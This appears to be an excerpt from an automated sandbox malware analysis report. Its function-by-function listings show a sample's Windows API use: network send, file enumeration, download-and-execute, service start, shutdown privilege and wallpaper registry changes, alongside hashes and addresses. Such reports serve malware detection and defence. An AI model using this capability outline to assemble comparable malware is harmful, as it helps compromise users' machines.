                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __floor_pentium4
                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                              • API String ID: 4168288129-2761157908
                              • Opcode ID: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                              • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                              • Opcode Fuzzy Hash: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                              • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                              APIs
                              • __EH_prolog.LIBCMT ref: 004089AE
                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                              • String ID:
                              • API String ID: 4043647387-0
                              • Opcode ID: d98ae4e7daef9a3e69c640f90a7d5488ff890335ded2551db512d4fe34539071
                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                              • Opcode Fuzzy Hash: d98ae4e7daef9a3e69c640f90a7d5488ff890335ded2551db512d4fe34539071
                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ManagerStart
                              • String ID:
                              • API String ID: 276877138-0
                              • Opcode ID: 5dd917813536b7672ac9c13df70b87255f00553c7d36e65651d1c6cfec5a07d5
                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                              • Opcode Fuzzy Hash: 5dd917813536b7672ac9c13df70b87255f00553c7d36e65651d1c6cfec5a07d5
                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                              APIs
                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                              • String ID: PowrProf.dll$SetSuspendState
                              • API String ID: 1589313981-1420736420
                              • Opcode ID: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                              • Opcode Fuzzy Hash: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                              • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                              APIs
                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                              APIs
                              • __EH_prolog.LIBCMT ref: 00407A91
                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstH_prologNext
                              • String ID:
                              • API String ID: 1157919129-0
                              • Opcode ID: b286cf0ee133902e80256ff5213cd56f18179fa9889be13e6ee793ceb973436e
                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                              • Opcode Fuzzy Hash: b286cf0ee133902e80256ff5213cd56f18179fa9889be13e6ee793ceb973436e
                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                              APIs
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                              • _free.LIBCMT ref: 00448067
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                              • String ID:
                              • API String ID: 1286116820-0
                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                              • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                              • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 0040627F, 004063A7
                              • open, xrefs: 0040622E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DownloadExecuteFileShell
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$open
                              • API String ID: 2825088817-1951624179
                              • Opcode ID: 2acac90ea26ae282b1cd30d8d08bc46c13ee6813d0b29e7ff3fc117fdc8d2ab9
                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                              • Opcode Fuzzy Hash: 2acac90ea26ae282b1cd30d8d08bc46c13ee6813d0b29e7ff3fc117fdc8d2ab9
                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNextsend
                              • String ID: x@G$x@G
                              • API String ID: 4113138495-3390264752
                              • Opcode ID: 6a5bde3d623c5719039e20489b0154fabc7f00e7ca869c6ac5046c44b0028d50
                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                              • Opcode Fuzzy Hash: 6a5bde3d623c5719039e20489b0154fabc7f00e7ca869c6ac5046c44b0028d50
                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                              APIs
                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateInfoParametersSystemValue
                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                              • API String ID: 4127273184-3576401099
                              • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                              • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                              • String ID:
                              • API String ID: 4212172061-0
                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                              APIs
                              • __EH_prolog.LIBCMT ref: 00408DAC
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstH_prologNext
                              • String ID:
                              • API String ID: 301083792-0
                              • Opcode ID: 8cd490d13a866fc2f4052215e5e6d9fbdac938c0bb94ee783097021b8d2e99c8
                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                              • Opcode Fuzzy Hash: 8cd490d13a866fc2f4052215e5e6d9fbdac938c0bb94ee783097021b8d2e99c8
                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorInfoLastLocale$_free$_abort
                              • String ID:
                              • API String ID: 2829624132-0
                              • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                              • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                              APIs
